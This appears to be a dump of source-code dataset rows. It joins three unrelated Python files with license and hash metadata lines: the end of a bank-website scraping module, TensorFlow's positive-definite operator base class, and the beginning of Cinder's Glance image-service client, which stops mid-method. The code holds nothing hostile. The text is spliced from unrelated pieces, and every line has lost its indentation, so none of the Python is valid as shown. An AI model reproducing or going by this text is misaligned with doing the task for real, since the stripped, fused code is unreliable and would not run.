def new_recipient(self, recipient, **params):
if self.currentSubBank is None:
self.getCurrentSubBank()
self.recipients_list.go(subbank=self.currentSubBank)
if self.page.has_list():
assert recipient.category in self.page.get_recipients_list(), \
'Recipient category "%s" is not on the website available list.' % recipient.category
self.page.go_list(recipient.category)
self.page.go_to_add()
if self.verify_pass.is_here():
self.page.check_personal_keys_error()
self.recipient_form = self.page.get_recipient_form()
raise AddRecipientStep(self.get_recipient_object(recipient), Value('Clé', label=self.page.get_question()))
else:
return self.continue_new_recipient(recipient, **params)
@need_login
def iter_subscriptions(self):
if self.currentSubBank is None:
self.getCurrentSubBank()
self.subscription.go(subbank=self.currentSubBank)
return self.page.iter_subscriptions()
@need_login
def iter_documents(self, subscription):
if self.currentSubBank is None:
self.getCurrentSubBank()
self.subscription.go(subbank=self.currentSubBank, params={'typ': 'doc'})
security_limit = 10
for i in range(security_limit):
for doc in self.page.iter_documents(sub_id=subscription.id):
yield doc
if self.page.is_last_page():
break
self.page.next_page()
| lgpl-3.0 | -2,725,548,668,398,420,000 | 46.310722 | 308 | 0.584316 | false |
rew4332/tensorflow | tensorflow/contrib/distributions/python/ops/operator_pd.py | 1 | 29415 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Base class for symmetric positive definite operator."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import numpy as np
import six
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
@six.add_metaclass(abc.ABCMeta)
class OperatorPDBase(object):
"""Class representing a (batch) of positive definite matrices `A`.
This class provides access to functions of a (batch) symmetric positive
definite (PD) matrix, without the need to materialize them. In other words,
this provides means to do "matrix free" computations.
### Basics
For example, `my_operator.matmul(x)` computes the result of matrix
multiplication, and this class is free to do this computation with or without
ever materializing a matrix.
In practice, this operator represents a (batch) matrix `A` with shape
`[N1,...,Nn, k, k]` for some `n >= 0`. The first `n` indices index a
batch member. For every batch index `(i1,...,ib)`, `A[i1,...,in, : :]` is
a `k x k` matrix. Again, this matrix `A` may not be materialized, but for
purposes of broadcasting this shape will be relevant.
Since `A` is (batch) positive definite, it has a (or several) square roots `S`
such that `A = SS^T`.
For example, if `MyOperator` inherits from `OperatorPDBase`, the user can do
```python
operator = MyOperator(...) # Initialize with some tensors.
operator.log_det()
# Compute the quadratic form x^T A^{-1} x for vector x.
x = ... # some shape [M1,...,Mm, N1,...,Nn, k] tensor
operator.inv_quadratic_form_on_vectors(x)
# Matrix multiplication by the square root, S w.
# If w is iid normal, S w has covariance A.
w = ... # some shape [N1,...,Nn, k, r] tensor, r >= 1
operator.sqrt_matmul(w)
```
The above three methods, `log_det`, `inv_quadratic_form_on_vectors`, and
`sqrt_matmul` provide "all" that is necessary to use a covariance matrix
in a multi-variate normal distribution. See the class `MVNOperatorPD`.
### Details about shape requirements
The `Operator` classes operate on batch vectors and batch matrices with
compatible shapes. `matrix` is a batch matrix with compatible shape if
```
operator.shape = [N1,...,Nn] + [j, k]
matrix.shape = [N1,...,Nn] + [k, r]
```
This is the same requirement as `tf.matmul`. `vec` is a batch vector with
compatible shape if
```
operator.shape = [N1,...,Nn] + [j, k]
vec.shape = [N1,...,Nn] + [k]
OR
vec.shape = [M1,...,Mm] + [N1,...,Nn] + [k]
```
We are strict with the matrix shape requirements since we do not want to
require `Operator` broadcasting. The `Operator` may be defined by large
tensors (thus broadcasting is expensive), or the `Operator` may be matrix
free, in which case there is no guarantee that the underlying implementation
will broadcast.
We are more flexible with vector shapes since extra leading dimensions can
be "flipped" to the end to change the vector to a compatible matrix.
"""
@abc.abstractproperty
def name(self):
"""String name identifying this `Operator`."""
return self._name
@abc.abstractproperty
def verify_pd(self):
"""Whether to verify that this `Operator` is positive definite."""
# return self._verify_pd
pass
@abc.abstractproperty
def dtype(self):
"""Data type of matrix elements of `A`."""
pass
def add_to_tensor(self, mat, name='add_to_tensor'):
"""Add matrix represented by this operator to `mat`. Equiv to `A + mat`.
Args:
mat: `Tensor` with same `dtype` and shape broadcastable to `self`.
name: A name to give this `Op`.
Returns:
A `Tensor` with broadcast shape and same `dtype` as `self`.
"""
with ops.name_scope(self.name):
with ops.name_scope(name, values=self.inputs + [mat]):
mat = ops.convert_to_tensor(mat, name='mat')
return self._add_to_tensor(mat)
def _add_to_tensor(self, mat):
# Re-implement in derived class if a more efficient method is available.
return self.to_dense() + mat
def _dispatch_based_on_batch(self, batch_method, singleton_method, **args):
"""Helper to automatically call batch or singleton operation."""
if self.get_shape().ndims is not None:
is_batch = self.get_shape().ndims > 2
if is_batch:
return batch_method(**args)
else:
return singleton_method(**args)
else:
is_batch = self.rank() > 2
return control_flow_ops.cond(
is_batch,
lambda: batch_method(**args),
lambda: singleton_method(**args)
)
def inv_quadratic_form_on_vectors(
self, x, name='inv_quadratic_form_on_vectors'):
"""Compute the quadratic form: `x^T A^{-1} x` where `x` is a batch vector.
`x` is a batch vector with compatible shape if
```
self.shape = [N1,...,Nn] + [k, k]
x.shape = [M1,...,Mm] + [N1,...,Nn] + [k]
```
Args:
x: `Tensor` with compatible batch vector shape and same `dtype` as self.
name: A name scope to use for ops added by this method.
Returns:
`Tensor` with shape `[M1,...,Mm] + [N1,...,Nn]` and same `dtype`
as `self`.
"""
with ops.name_scope(self.name):
with ops.name_scope(name, values=[x] + self.inputs):
x = ops.convert_to_tensor(x, name='x')
return self._inv_quadratic_form_on_vectors(x)
def _inv_quadratic_form_on_vectors(self, x):
# Implement in derived class to enable self.inv_quadratic_form_on_vectors().
#
# To implement,
# Depending on which is more efficient, derived class should be a one-liner
# calling either
# return self._iqfov_via_sqrt_solve(x)
# OR
# return self._iqfov_via_solve(x)
# both of which are written in this base class.
raise NotImplementedError(
'inv_quadratic_form_on_vectors not implemented')
def _iqfov_via_sqrt_solve(self, x):
"""Get the inverse quadratic form on vectors via a sqrt_solve."""
# x^{-1} A^{-1} x = || S^{-1}x ||^2,
# where S is a square root of A (A = SS^T).
# Steps:
# 1. Convert x to a matrix, flipping all extra dimensions in `x` to the
# final dimension of x_matrix.
x_matrix = _flip_vector_to_matrix(
x, self.batch_shape(), self.get_batch_shape())
# 2. Get soln_matrix = S^{-1} x_matrix
soln_matrix = self.sqrt_solve(x_matrix)
# 3. Reshape back to a vector.
soln = _flip_matrix_to_vector(
soln_matrix, _extract_batch_shape(x, 1), x.get_shape()[:-1])
# 4. L2 (batch) vector norm squared.
result = math_ops.reduce_sum(
math_ops.square(soln), reduction_indices=[-1])
result.set_shape(x.get_shape()[:-1])
return result
def _iqfov_via_solve(self, x):
"""Get the inverse quadratic form on vectors via a solve."""
# x^{-1} A^{-1} x
# 1. Convert x to a matrix, flipping all extra dimensions in `x` to the
# final dimension of x_matrix.
x_matrix = _flip_vector_to_matrix(
x, self.batch_shape(), self.get_batch_shape())
# 2. Get x_whitened_matrix = A^{-1} x_matrix
soln_matrix = self.solve(x_matrix)
# 3. Reshape back to a vector.
soln = _flip_matrix_to_vector(
soln_matrix, _extract_batch_shape(x, 1), x.get_shape()[:-1])
# 4. Compute the dot product: x^T soln
result = math_ops.reduce_sum(x * soln, reduction_indices=[-1])
result.set_shape(x.get_shape()[:-1])
return result
def det(self, name='det'):
"""Determinant for every batch member.
Args:
name: A name scope to use for ops added by this method.
Returns:
Determinant for every batch member.
"""
# Derived classes are encouraged to implement log_det() (since it is
# usually more stable), and then det() comes for free.
with ops.name_scope(self.name):
with ops.name_scope(name, values=self.inputs):
return self._det()
def _det(self):
return math_ops.exp(self.log_det())
def log_det(self, name='log_det'):
"""Log of the determinant for every batch member.
Args:
name: A name scope to use for ops added by this method.
Returns:
Logarithm of determinant for every batch member.
"""
with ops.name_scope(self.name):
with ops.name_scope(name, values=self.inputs):
return self._dispatch_based_on_batch(self._batch_log_det, self._log_det)
def _batch_log_det(self):
# Implement in derived class to enable self.log_det(x).
raise NotImplementedError('Log determinant (log_det) not implemented.')
def _log_det(self):
# As implemented here, this just calls the batch version. If a more
# efficient non-batch version is available, override in the derived class.
return self._batch_log_det()
def sqrt_log_det(self, name='sqrt_log_det'):
"""Log of the determinant of the sqrt `S` for every batch member.
Args:
name: A name scope to use for ops added by this method.
Returns:
Logarithm of determinant of the square root `S` for every batch member.
"""
with ops.name_scope(self.name):
with ops.name_scope(name, values=self.inputs):
return self._dispatch_based_on_batch(
self._batch_sqrt_log_det, self._sqrt_log_det)
def _batch_sqrt_log_det(self):
# Over-ride in derived class if it can be done more efficiently.
return 0.5 * self._log_det()
def _sqrt_log_det(self):
# As implemented here, this just calls the batch version. If a more
# efficient non-batch version is available, override in the derived class.
return self._batch_sqrt_log_det()
@abc.abstractproperty
def inputs(self):
"""List of tensors that were provided as initialization inputs."""
pass
@abc.abstractmethod
def get_shape(self):
"""Static `TensorShape` of entire operator.
If this operator represents the batch matrix `A` with
`A.shape = [N1,...,Nn, k, k]`, then this returns
`TensorShape([N1,...,Nn, k, k])`
Returns:
`TensorShape`, statically determined, may be undefined.
"""
pass
def get_batch_shape(self):
"""`TensorShape` with batch shape. Statically determined if possible.
If this operator represents the batch matrix `A` with
`A.shape = [N1,...,Nn, k, k]`, then this returns `TensorShape([N1,...,Nn])`
Returns:
`TensorShape`, statically determined, may be undefined.
"""
# Derived classes get this "for free" once .get_shape() is implemented.
return self.get_shape()[:-2]
def get_vector_shape(self):
"""`TensorShape` of vectors this operator will work with.
If this operator represents the batch matrix `A` with
`A.shape = [N1,...,Nn, k, k]`, then this returns
`TensorShape([N1,...,Nn, k])`
Returns:
`TensorShape`, statically determined, may be undefined.
"""
# Derived classes get this "for free" once .get_shape() is implemented.
return self.get_shape()[:-1]
def shape(self, name='shape'):
"""Equivalent to `tf.shape(A).` Equal to `[N1,...,Nn, k, k]`, `n >= 0`.
Args:
name: A name scope to use for ops added by this method.
Returns:
`int32` `Tensor`
"""
with ops.name_scope(self.name):
with ops.name_scope(name, values=self.inputs):
return self._shape()
@abc.abstractmethod
def _shape(self):
# Implement in derived class to enable .shape().
pass
def rank(self, name='rank'):
"""Tensor rank. Equivalent to `tf.rank(A)`. Will equal `n + 2`.
If this operator represents the batch matrix `A` with
`A.shape = [N1,...,Nn, k, k]`, the `rank` is `n + 2`.
Args:
name: A name scope to use for ops added by this method.
Returns:
`int32` `Tensor`
"""
# Derived classes get this "for free" once .shape() is implemented.
with ops.name_scope(self.name):
with ops.name_scope(name, values=self.inputs):
return array_ops.size(self.shape())
def batch_shape(self, name='batch_shape'):
"""Shape of batches associated with this operator.
If this operator represents the batch matrix `A` with
`A.shape = [N1,...,Nn, k, k]`, the `batch_shape` is `[N1,...,Nn]`.
Args:
name: A name scope to use for ops added by this method.
Returns:
`int32` `Tensor`
"""
# Derived classes get this "for free" once .shape() is implemented.
with ops.name_scope(self.name):
with ops.name_scope(name, values=self.inputs):
return array_ops.slice(self.shape(), [0], [self.rank() - 2])
def vector_shape(self, name='vector_shape'):
"""Shape of (batch) vectors that this (batch) matrix will multiply.
If this operator represents the batch matrix `A` with
`A.shape = [N1,...,Nn, k, k]`, the `vector_shape` is `[N1,...,Nn, k]`.
Args:
name: A name scope to use for ops added by this method.
Returns:
`int32` `Tensor`
"""
# Derived classes get this "for free" once .shape() is implemented.
with ops.name_scope(self.name):
with ops.name_scope(name, values=self.inputs):
return array_ops.concat(
0, (self.batch_shape(), [self.vector_space_dimension()]))
def vector_space_dimension(self, name='vector_space_dimension'):
"""Dimension of vector space on which this acts. The `k` in `R^k`.
If this operator represents the batch matrix `A` with
`A.shape = [N1,...,Nn, k, k]`, the `vector_space_dimension` is `k`.
Args:
name: A name scope to use for ops added by this method.
Returns:
`int32` `Tensor`
"""
# Derived classes get this "for free" once .shape() is implemented.
with ops.name_scope(self.name):
with ops.name_scope(name, values=self.inputs):
return array_ops.gather(self.shape(), self.rank() - 1)
def matmul(self, x, transpose_x=False, name='matmul'):
"""Left (batch) matmul `x` by this matrix: `Ax`.
`x` is a batch matrix with compatible shape if
```
self.shape = [N1,...,Nn] + [k, k]
x.shape = [N1,...,Nn] + [k, r]
```
Args:
x: `Tensor` with shape `self.batch_shape + [k, r]` and same `dtype` as
this `Operator`.
transpose_x: If `True`, `x` is transposed before multiplication.
name: A name to give this `Op`.
Returns:
A result equivalent to `tf.batch_matmul(self.to_dense(), x)`.
"""
with ops.name_scope(self.name):
with ops.name_scope(name, values=[x] + self.inputs):
x = ops.convert_to_tensor(x, name='x')
return self._dispatch_based_on_batch(
self._batch_matmul, self._matmul, x=x, transpose_x=transpose_x)
def _batch_matmul(self, x, transpose_x=False):
# Implement in derived class to enable self.matmul(x).
raise NotImplementedError('This operator has no batch matmul Op.')
def _matmul(self, x, transpose_x=False):
# As implemented here, this just calls the batch version. If a more
# efficient non-batch version is available, override in the derived class.
return self._batch_matmul(x, transpose_x=transpose_x)
def sqrt_matmul(self, x, transpose_x=False, name='sqrt_matmul'):
"""Left (batch) matmul `x` by a sqrt of this matrix: `Sx` where `A = S S^T`.
`x` is a batch matrix with compatible shape if
```
self.shape = [N1,...,Nn] + [k, k]
x.shape = [N1,...,Nn] + [k, r]
```
Args:
x: `Tensor` with shape `self.batch_shape + [k, r]` and same `dtype` as
this `Operator`.
transpose_x: If `True`, `x` is transposed before multiplication.
name: A name scope to use for ops added by this method.
Returns:
A result equivalent to `tf.batch_matmul(self.sqrt_to_dense(), x)`.
"""
with ops.name_scope(self.name):
with ops.name_scope(name, values=[x] + self.inputs):
x = ops.convert_to_tensor(x, name='x')
return self._dispatch_based_on_batch(
self._batch_sqrt_matmul, self._sqrt_matmul, x=x,
transpose_x=transpose_x)
def _batch_sqrt_matmul(self, x, transpose_x=False):
# Implement in derived class to enable self.sqrt_matmul(x).
raise NotImplementedError('This operator has no batch_sqrt_matmul Op.')
def _sqrt_matmul(self, x, transpose_x=False):
# As implemented here, this just calls the batch version. If a more
# efficient non-batch version is available, override in the derived class.
return self._batch_sqrt_matmul(x, transpose_x=transpose_x)
def solve(self, rhs, name='solve'):
"""Solve `r` batch systems: `A X = rhs`.
`rhs` is a batch matrix with compatible shape if
```python
self.shape = [N1,...,Nn] + [k, k]
rhs.shape = [N1,...,Nn] + [k, r]
```
For every batch member, this is done in `O(r*k^2)` complexity using back
substitution.
```python
# Solve one linear system (r = 1) for every member of the length 10 batch.
A = ... # shape 10 x 2 x 2
RHS = ... # shape 10 x 2 x 1
operator.shape # = 10 x 2 x 2
X = operator.squrt_solve(RHS) # shape 10 x 2 x 1
# operator.squrt_matmul(X) ~ RHS
X[3, :, 0] # Solution to the linear system A[3, :, :] x = RHS[3, :, 0]
# Solve five linear systems (r = 5) for every member of the length 10 batch.
operator.shape # = 10 x 2 x 2
RHS = ... # shape 10 x 2 x 5
...
X[3, :, 2] # Solution to the linear system A[3, :, :] x = RHS[3, :, 2]
```
Args:
rhs: `Tensor` with same `dtype` as this operator and compatible shape,
`rhs.shape = self.shape[:-1] + [r]` for `r >= 1`.
name: A name scope to use for ops added by this method.
Returns:
`Tensor` with same `dtype` and shape as `x`.
"""
with ops.name_scope(self.name):
with ops.name_scope(name, values=[rhs] + self.inputs):
rhs = ops.convert_to_tensor(rhs, name='rhs')
return self._dispatch_based_on_batch(
self._batch_solve, self._solve, rhs=rhs)
def _solve(self, rhs):
# As implemented here, this just calls the batch version. If a more
# efficient non-batch version is available, override in the derived class.
return self._batch_solve(rhs)
def _batch_solve(self, rhs):
# Implement in derived class to enable self.solve().
raise NotImplementedError('batch_solve not implemented for this Operator.')
def sqrt_solve(self, rhs, name='sqrt_solve'):
"""Solve `r` batch systems involving sqrt: `S X = rhs` where `A = SS^T`.
`rhs` is a batch matrix with compatible shape if
```python
self.shape = [N1,...,Nn] + [k, k]
rhs.shape = [N1,...,Nn] + [k, r]
```
For every batch member, this is done in `O(r*k^2)` complexity using back
substitution.
```python
# Solve one linear system (r = 1) for every member of the length 10 batch.
A = ... # shape 10 x 2 x 2
RHS = ... # shape 10 x 2 x 1
operator.shape # = 10 x 2 x 2
X = operator.squrt_solve(RHS) # shape 10 x 2 x 1
# operator.squrt_matmul(X) ~ RHS
X[3, :, 0] # Solution to the linear system S[3, :, :] x = RHS[3, :, 0]
# Solve five linear systems (r = 5) for every member of the length 10 batch.
operator.shape # = 10 x 2 x 2
RHS = ... # shape 10 x 2 x 5
...
X[3, :, 2] # Solution to the linear system S[3, :, :] x = RHS[3, :, 2]
```
Args:
rhs: `Tensor` with same `dtype` as this operator and compatible shape,
`rhs.shape = self.shape[:-1] + [r]` for `r >= 1`.
name: A name scope to use for ops added by this method.
Returns:
`Tensor` with same `dtype` and shape as `x`.
"""
with ops.name_scope(self.name):
with ops.name_scope(name, values=[rhs] + self.inputs):
rhs = ops.convert_to_tensor(rhs, name='rhs')
return self._dispatch_based_on_batch(
self._batch_sqrt_solve, self._sqrt_solve, rhs=rhs)
def _sqrt_solve(self, rhs):
# As implemented here, this just calls the batch version. If a more
# efficient non-batch version is available, override in the derived class.
return self._batch_sqrt_solve(rhs)
def _batch_sqrt_solve(self, rhs):
# Implement in derived class to enable self.sqrt_solve()
raise NotImplementedError(
'batch sqrt_solve not implemented for this Operator.')
def to_dense(self, name='to_dense'):
"""Return a dense (batch) matrix representing this operator."""
with ops.name_scope(self.name):
with ops.name_scope(name, values=self.inputs):
return self._to_dense()
def _to_dense(self):
# Implement in derived class to enable self.to_dense().
raise NotImplementedError('This operator has no dense representation.')
def sqrt_to_dense(self, name='sqrt_to_dense'):
"""Return a dense (batch) matrix representing sqrt of this operator."""
with ops.name_scope(self.name):
with ops.name_scope(name, values=self.inputs):
return self._sqrt_to_dense()
def _sqrt_to_dense(self):
# Implement in derived class to enable self.sqrt_to_dense().
raise NotImplementedError('This operator has no dense sqrt representation.')
def _flip_matrix_to_vector(mat, batch_shape, static_batch_shape):
"""Flip dims to reshape batch matrix `mat` to a vector with given batch shape.
```python
mat = tf.random_normal(2, 3, 4, 6)
# Flip the trailing dimension around to the front.
_flip_matrix_to_vector(mat, [6, 2, 3], [6, 3, 2]) # Shape [6, 2, 3, 4]
# Flip the trailing dimension around then reshape batch indices to batch_shape
_flip_matrix_to_vector(mat, [6, 3, 2], [6, 3, 2]) # Shape [6, 3, 2, 4]
_flip_matrix_to_vector(mat, [2, 3, 2, 3], [2,3,2,3]) # Shape [2, 3, 2, 3, 4]
```
Assume `mat.shape = matrix_batch_shape + [k, M]`. The returned vector is
generated in two steps:
1. Flip the final dimension to the front, giving a shape
`[M] + matrix_batch_shape + [k]`.
2. Reshape the leading dimensions, giving final shape = `batch_shape + [k]`.
The reshape in step 2 will fail if the number of elements is not equal, i.e.
`M*prod(matrix_batch_shape) != prod(batch_shape)`.
See also: _flip_vector_to_matrix.
Args:
mat: `Tensor` with rank `>= 2`.
batch_shape: `int32` `Tensor` giving leading "batch" shape of result.
static_batch_shape: `TensorShape` object giving batch shape of result.
Returns:
`Tensor` with same elements as `mat` but with shape `batch_shape + [k]`.
"""
mat = ops.convert_to_tensor(mat, name='mat')
if (static_batch_shape.is_fully_defined()
and mat.get_shape().is_fully_defined()):
return _flip_matrix_to_vector_static(mat, static_batch_shape)
else:
return _flip_matrix_to_vector_dynamic(mat, batch_shape)
def _flip_matrix_to_vector_static(mat, static_batch_shape):
"""Flip matrix to vector with static shapes."""
mat_rank = mat.get_shape().ndims
k = mat.get_shape()[-2]
final_shape = static_batch_shape.concatenate(k)
# mat.shape = matrix_batch_shape + [k, M]
# Permutation corresponding to [M] + matrix_batch_shape + [k]
perm = [mat_rank - 1] + list(range(0, mat_rank - 1))
mat_with_end_at_beginning = array_ops.transpose(mat, perm=perm)
vector = array_ops.reshape(mat_with_end_at_beginning, final_shape)
return vector
def _flip_matrix_to_vector_dynamic(mat, batch_shape):
"""Flip matrix to vector with dynamic shapes."""
mat_rank = array_ops.rank(mat)
k = array_ops.gather(array_ops.shape(mat), mat_rank - 2)
final_shape = array_ops.concat(0, (batch_shape, [k]))
# mat.shape = matrix_batch_shape + [k, M]
# Permutation corresponding to [M] + matrix_batch_shape + [k]
perm = array_ops.concat(
0, ([mat_rank - 1], math_ops.range(0, mat_rank - 1)))
mat_with_end_at_beginning = array_ops.transpose(mat, perm=perm)
vector = array_ops.reshape(mat_with_end_at_beginning, final_shape)
return vector
def _flip_vector_to_matrix(vec, batch_shape, static_batch_shape):
"""Flip dims to reshape batch vector `x` to a matrix with given batch shape.
```python
vec = tf.random_normal(2, 3, 4, 5)
# Flip the leading dimension to the end.
_flip_vector_to_matrix(vec, [3, 4], [3, 4]) # Shape [3, 4, 5, 2]
# Flip nothing, just extend with a singleton dimension.
_flip_vector_to_matrix(vec, [2, 3, 4], [2, 3, 4]) # Shape [2, 3, 4, 5, 1]
# Flip leading dimension to the end and reshape the batch indices to
# batch_shape.
_flip_vector_to_matrix(vec, [4, 3], [4, 3]) # Shape [4, 3, 5, 2]
```
Suppose `batch_shape` is length `n`. Then...
Given `vec.shape = [M1,...,Mm] + [N1,...,Nn] + [k]`, for some
`m > 0` we reshape to a batch matrix with shape `batch_shape + [k, M]`
where `M = M1*...*Mm`. This is done by "flipping" the leading dimensions to
the end and possibly reshaping `[N1,...,Nn]` to `batch_shape`.
In the case `vec.shape = [N1,...,Nn] + [k]`, we reshape to
`batch_shape + [k, 1]` by extending the tensor with a singleton dimension and
possibly reshaping `[N1,...,Nn]` to `batch_shape`.
See also: _flip_matrix_to_vector.
Args:
vec: `Tensor` with shape `[M1,...,Mm] + [N1,...,Nn] + [k]`
batch_shape: `int32` `Tensor`.
static_batch_shape: `TensorShape` with statically determined batch shape.
Returns:
`Tensor` with same `dtype` as `vec` and new shape.
"""
vec = ops.convert_to_tensor(vec, name='vec')
if (
vec.get_shape().is_fully_defined()
and static_batch_shape.is_fully_defined()):
return _flip_vector_to_matrix_static(vec, static_batch_shape)
else:
return _flip_vector_to_matrix_dynamic(vec, batch_shape)
def _flip_vector_to_matrix_dynamic(vec, batch_shape):
"""_flip_vector_to_matrix with dynamic shapes."""
# Shapes associated with batch_shape
batch_rank = array_ops.size(batch_shape)
# Shapes associated with vec.
vec = ops.convert_to_tensor(vec, name='vec')
vec_shape = array_ops.shape(vec)
vec_rank = array_ops.rank(vec)
vec_batch_rank = vec_rank - 1
m = vec_batch_rank - batch_rank
# vec_shape_left = [M1,...,Mm] or [].
vec_shape_left = array_ops.slice(vec_shape, [0], [m])
# If vec_shape_left = [], then condensed_shape = [1] since reduce_prod([]) = 1
# If vec_shape_left = [M1,...,Mm], condensed_shape = [M1*...*Mm]
condensed_shape = [math_ops.reduce_prod(vec_shape_left)]
k = array_ops.gather(vec_shape, vec_rank - 1)
new_shape = array_ops.concat(0, (batch_shape, [k], condensed_shape))
def _flip_front_dims_to_back():
# Permutation corresponding to [N1,...,Nn] + [k, M1,...,Mm]
perm = array_ops.concat(
0, (math_ops.range(m, vec_rank), math_ops.range(0, m)))
return array_ops.transpose(vec, perm=perm)
x_flipped = control_flow_ops.cond(
math_ops.less(0, m),
_flip_front_dims_to_back,
lambda: array_ops.expand_dims(vec, -1))
return array_ops.reshape(x_flipped, new_shape)
def _flip_vector_to_matrix_static(vec, batch_shape):
"""_flip_vector_to_matrix with static shapes."""
# Shapes associated with batch_shape
batch_rank = batch_shape.ndims
# Shapes associated with vec.
vec = ops.convert_to_tensor(vec, name='vec')
vec_shape = vec.get_shape()
vec_rank = len(vec_shape)
vec_batch_rank = vec_rank - 1
m = vec_batch_rank - batch_rank
# vec_shape_left = [M1,...,Mm] or [].
vec_shape_left = vec_shape[:m]
# If vec_shape_left = [], then condensed_shape = [1] since reduce_prod([]) = 1
# If vec_shape_left = [M1,...,Mm], condensed_shape = [M1*...*Mm]
condensed_shape = [np.prod(vec_shape_left)]
k = vec_shape[-1]
new_shape = batch_shape.concatenate(k).concatenate(condensed_shape)
def _flip_front_dims_to_back():
# Permutation corresponding to [N1,...,Nn] + [k, M1,...,Mm]
perm = array_ops.concat(
0, (math_ops.range(m, vec_rank), math_ops.range(0, m)))
return array_ops.transpose(vec, perm=perm)
if 0 < m:
x_flipped = _flip_front_dims_to_back()
else:
x_flipped = array_ops.expand_dims(vec, -1)
return array_ops.reshape(x_flipped, new_shape)
def _extract_batch_shape(x, num_event_dims, name='extract_batch_shape'):
"""Extract the batch shape from `x`.
Assuming `x.shape = batch_shape + event_shape`, when `event_shape` has
`num_event_dims` dimensions. This `Op` returns the batch shape `Tensor`.
Args:
x: `Tensor` with rank at least `num_event_dims`. If rank is not high enough
this `Op` will fail.
num_event_dims: `int32` scalar `Tensor`. The number of trailing dimensions
in `x` to be considered as part of `event_shape`.
name: A name to prepend to created `Ops`.
Returns:
batch_shape: `1-D` `int32` `Tensor`
"""
with ops.name_scope(name, values=[x]):
x = ops.convert_to_tensor(x, name='x')
return array_ops.slice(
array_ops.shape(x), [0], [array_ops.rank(x) - num_event_dims])
| apache-2.0 | -9,187,433,578,970,137,000 | 34.741191 | 80 | 0.637702 | false |
Nexenta/cinder | cinder/image/glance.py | 2 | 24387 | # Copyright 2010 OpenStack Foundation
# Copyright 2013 NTT corp.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Implementation of an image service that uses Glance as the backend"""
from __future__ import absolute_import
import copy
import itertools
import random
import shutil
import sys
import time
import glanceclient.exc
from oslo_config import cfg
from oslo_log import log as logging
from oslo_serialization import jsonutils
from oslo_utils import timeutils
import six
from six.moves import range
from six.moves import urllib
from cinder import exception
from cinder.i18n import _, _LE
glance_opts = [
cfg.ListOpt('allowed_direct_url_schemes',
default=[],
help='A list of url schemes that can be downloaded directly '
'via the direct_url. Currently supported schemes: '
'[file].'),
cfg.StrOpt('glance_catalog_info',
default='image:glance:publicURL',
help='Info to match when looking for glance in the service '
'catalog. Format is: separated values of the form: '
'<service_type>:<service_name>:<endpoint_type> - '
'Only used if glance_api_servers are not provided.'),
]
glance_core_properties_opts = [
cfg.ListOpt('glance_core_properties',
default=['checksum', 'container_format',
'disk_format', 'image_name', 'image_id',
'min_disk', 'min_ram', 'name', 'size'],
help='Default core properties of image')
]
CONF = cfg.CONF
CONF.register_opts(glance_opts)
CONF.register_opts(glance_core_properties_opts)
CONF.import_opt('glance_api_version', 'cinder.common.config')
LOG = logging.getLogger(__name__)
def _parse_image_ref(image_href):
"""Parse an image href into composite parts.
:param image_href: href of an image
:returns: a tuple of the form (image_id, netloc, use_ssl)
:raises ValueError
"""
url = urllib.parse.urlparse(image_href)
netloc = url.netloc
image_id = url.path.split('/')[-1]
use_ssl = (url.scheme == 'https')
return (image_id, netloc, use_ssl)
def _create_glance_client(context, netloc, use_ssl, version=None):
"""Instantiate a new glanceclient.Client object."""
if version is None:
version = CONF.glance_api_version
params = {}
if use_ssl:
scheme = 'https'
# https specific params
params['insecure'] = CONF.glance_api_insecure
params['ssl_compression'] = CONF.glance_api_ssl_compression
params['cacert'] = CONF.glance_ca_certificates_file
else:
scheme = 'http'
if CONF.auth_strategy == 'keystone':
params['token'] = context.auth_token
if CONF.glance_request_timeout is not None:
params['timeout'] = CONF.glance_request_timeout
endpoint = '%s://%s' % (scheme, netloc)
return glanceclient.Client(str(version), endpoint, **params)
def get_api_servers(context):
"""Return Iterable over shuffled api servers.
Shuffle a list of glance_api_servers and return an iterator
that will cycle through the list, looping around to the beginning
if necessary. If CONF.glance_api_servers is None then they will
be retrieved from the catalog.
"""
api_servers = []
api_servers_info = []
if CONF.glance_api_servers is None:
info = CONF.glance_catalog_info
try:
service_type, service_name, endpoint_type = info.split(':')
except ValueError:
raise exception.InvalidConfigurationValue(_(
"Failed to parse the configuration option "
"'glance_catalog_info', must be in the form "
"<service_type>:<service_name>:<endpoint_type>"))
for entry in context.service_catalog:
if entry.get('type') == service_type:
api_servers.append(
entry.get('endpoints')[0].get(endpoint_type))
else:
for api_server in CONF.glance_api_servers:
api_servers.append(api_server)
for api_server in api_servers:
if '//' not in api_server:
api_server = 'http://' + api_server
url = urllib.parse.urlparse(api_server)
netloc = url.netloc + url.path
use_ssl = (url.scheme == 'https')
api_servers_info.append((netloc, use_ssl))
random.shuffle(api_servers_info)
return itertools.cycle(api_servers_info)
class GlanceClientWrapper(object):
"""Glance client wrapper class that implements retries."""
def __init__(self, context=None, netloc=None, use_ssl=False,
version=None):
if netloc is not None:
self.client = self._create_static_client(context,
netloc,
use_ssl, version)
else:
self.client = None
self.api_servers = None
self.version = version
def _create_static_client(self, context, netloc, use_ssl, version):
"""Create a client that we'll use for every call."""
self.netloc = netloc
self.use_ssl = use_ssl
self.version = version
return _create_glance_client(context,
self.netloc,
self.use_ssl, self.version)
def _create_onetime_client(self, context, version):
"""Create a client that will be used for one call."""
if self.api_servers is None:
self.api_servers = get_api_servers(context)
self.netloc, self.use_ssl = next(self.api_servers)
return _create_glance_client(context,
self.netloc,
self.use_ssl, version)
def call(self, context, method, *args, **kwargs):
"""Call a glance client method.
If we get a connection error,
retry the request according to CONF.glance_num_retries.
"""
version = kwargs.pop('version', self.version)
